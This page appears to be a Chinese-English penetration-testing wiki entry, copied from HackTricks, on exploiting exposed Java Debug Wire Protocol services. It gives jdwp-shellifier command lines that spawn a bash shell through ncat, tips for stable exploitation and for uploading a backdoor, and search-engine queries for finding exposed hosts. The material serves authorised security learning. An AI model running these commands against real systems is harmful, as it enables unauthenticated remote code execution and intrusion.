--- title: "5005 - Jdwp" weight: 5005 date: "2026-03-10T10:03:28+08:00" lastmod: "2026-03-10T13:26:55+08:00" --- 💡 **学习提示**: 本文档介绍 **Jdwp Java Debug Wire Protocol** 的渗透测试方法,适合信息安全初学者和从业人员参考。 ⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。 --- > ⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。 ## 渗透测试 JDWP - Java Debug Wire 协议 ### Exploiting JDWP exploitation hinges on the **protocol's lack of authentication and encryption**. It's generally found on **port 8000**, but other ports are possible. The initial connection is made by sending a "JDWP-Handshake" to the target port. If a JDWP service is active, it responds with the same string, confirming its presence. This handshake acts as a fingerprinting method to identify JDWP services on the network. In terms of process identification, searching for the string "jdwk" in Java processes can indicate an active JDWP session. The go-to tool is [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier). You can use it with different parameters: ```bash ./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data ./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something ./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept ``` I found that the use of `--break-on 'java.lang.String.indexOf'` makes the exploit more **stable**. And if you have the chance to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable. ### More details **This is a summary of [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)**. Check it for further details. 1. **JDWP 概述**: - It's a packet-based network binary protocol, primarily synchronous. - Lacks authentication and encryption, making it vulnerable when exposed to hostile networks. 2. **JDWP Handshake**: - A simple handshake process is used to initiate communication. A 14-character ASCII string “JDWP-Handshake” is exchanged between the Debugger (client) and the Debuggee (server). 3. **JDWP Communication**: - Messages have a simple structure with fields like Length, Id, Flag, and CommandSet. - CommandSet values range from 0x40 to 0x80, representing different actions and events. 4. **漏洞利用**: - JDWP allows loading and invoking arbitrary classes and bytecode, posing security risks. - The article details an exploitation process in five steps, involving fetching Java Runtime references, setting breakpoints, and invoking methods. 5. **Real-Life 漏洞利用**: - Despite potential firewall protections, JDWP services are discoverable and exploitable in real-world scenarios, as demonstrated by searches on platforms like ShodanHQ and GitHub. - The exploit script was tested against various JDK versions and is platform-independent, offering reliable 远程代码执行 (远程代码执行). 6. **安全 Implications**: - The presence of open JDWP services on the internet underscores the need for regular security reviews, disabling debug functionalities in production, and proper firewall configurations. #### **参考资料:** - [[https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)] - [https://github.com/IOActive/jdwp-shellifier](https://github.com/IOActive/jdwp-shellifier) - [http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html](http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html) - http://www.secdev.org/projects/scapy(no longer active) - [http://www.shodanhq.com/search?q=JDWP-HANDSHAKE](http://www.shodanhq.com/search?q=JDWP-HANDSHAKE) - http://www.hsc-news.com/archives/2013/000109.html (no longer active) - [http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt](http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt) - [https://github.com/search?q=-Xdebug+-Xrunjdwp\&type=Code\&ref=searchresults](https://github.com/search?q=-Xdebug+-Xrunjdwp\&type=Code\&ref=searchresults) - [http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html](http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html) - [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html](http://docs.oracle.com) - [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html](http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html) - [http://nmap.org/nsedoc/scripts/jdwp-exec.html](http://nmap.org/nsedoc/scripts/jdwp-exec.html) --- --- --- ### 搜索引擎语法 #### FOFA ```bash # FOFA 搜索语法 port="5005" ``` #### Shodan ```bash # Shodan 搜索语法 port:5005 ``` #### ZoomEye ```bash # ZoomEye 搜索语法 port:5005 ``` --- ## 📖 参考资料 - [HackTricks - 5005-jdwp](https://book.hacktricks.wiki/en/network-services-pentesting/5005-jdwp.html)